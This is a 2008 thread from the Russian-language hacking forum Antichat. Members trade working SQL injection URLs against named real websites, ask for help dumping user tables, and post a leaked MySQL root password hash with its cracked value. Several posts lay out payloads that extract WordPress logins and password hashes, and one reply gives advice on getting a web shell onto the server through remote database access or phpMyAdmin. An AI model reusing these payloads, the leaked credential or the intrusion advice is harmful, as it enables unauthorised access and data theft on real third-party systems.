ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.11.2008, 21:02
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559
Репутация:
2947
|
|
Скинь ссылочку... авось помогу...
|
|
|
04.11.2008, 21:04
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
Сообщение от slider
И не только вывод версии ... тем более если версия 5 можно сбрутить все необходимые таблицы и колонки .... а затем полноценный вывод из нужной нам таблицы...
то же самое и в версии 4ре .. только нам нужно перебрать стандартные значения табиц и колонок ...
ну это понятно)))) я по посимвольному брутфорсу в мускуле 5 статью помню писал на ачате =) Только потом сам ее и удалил, если каму надо могу выложить
http://slil.ru/26301742 вот залил, надеюсь каму нить она поможет...
http://depositfiles.com/files/nq76bn4ca
http://www.sendspace.com/file/3snrub
Последний раз редактировалось _Pantera_; 04.11.2008 в 21:15..
|
|
|
|
04.11.2008, 21:12
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
_Pantera_
Перезалей на сэндспэйс плз.
|
|
|
|
04.11.2008, 21:57
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
Интересная статья, зря удалил)
|
|
|
|
04.11.2008, 22:09
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
Действительно хорошая статья. Удалял то зачем?
|
|
|
|
05.11.2008, 20:12
|
|
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070
Репутация:
173
|
|
http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,table_name,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+ from+information_schema.tables/*
Значит ситуация такая - есть куча табл с юзерами но доступ к ним и некоторым полям их запрещен, конструкции unhex(hex()), aes_de... не помогают. Зато есть доступ к mysql.user оттудова я стянул и сбрутил пасс рута.
ROOT:*85FD004275C6D61CD6CAD3DEC994E8E326F5AEF2( nclmswpq)
Включен file_priv, можно читать диры сайта.
/home/www/htdocs/SNGBOARD/admin - нельзя прочитать
/home/www/phpmyadmin - нельзя прочитать
Пробовал залить шелл через into outfile в диру /home/www/htdocs/sngboard так как кавычки фильтруются юзал подзапросы но тоже безрезультатно 
собсно вопросы:
- что можно сделать с рутом от мускуля?
- что можно найти интересного в дирах?
- и какже всетаки залить шелл? |
|
|
|
05.11.2008, 20:41
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
***.com/index.php?pid=-1'+union+select+1,2,3,4,5,6,7--
Ошибку выводит
You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7--'' at line 1
Число столбцов определил "order by"
Что делать не представляю
|
|
|
|
05.11.2008, 20:44
|
|
Новичок
Регистрация: 27.01.2008
Сообщений: 6
Провел на форуме:
167725
Репутация:
1
|
|
помогите плиз! подобрать колонки
скуль: http://sport-life.ru/shop/index.php?section=1+union+select+version(),2,3,4,5 +from+users/*
которые нашёл: firstname, id, lastNamE, address, phone
|
|
|
|
05.11.2008, 20:58
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
beerhack Доступ есть ко всем таблицам просто они в разных базах:
http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,tabl e_schema,table_name),8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27+from+information_sche ma.tables/*
И нужно писать их маленькими буквами 
Вот напимер доступ к одной из них:
http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user _login,user_pass),8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27+from+wordpress.wp_users/*
Ковычки экранируются, и значит через инъекцию ты шелл не зальёшь, пробуй через админку
|
|
|
|
05.11.2008, 21:01
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
@beerhack
что можно сделать с рутом от мускуля?
подключиться к мускулу, разумеется если сервер разрешает удаленные подключения (по умолчанию порт 3306). Или же воспользоваться phpmyadmin, если он установлен на удаленном сервере и ты знаешь путь до него
что можно найти интересного в дирах?
скрипт-аплоадер
- и какже всетаки залить шелл?
им же |
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?928499){kind=avatar}
Похожие темы
Линейный вид
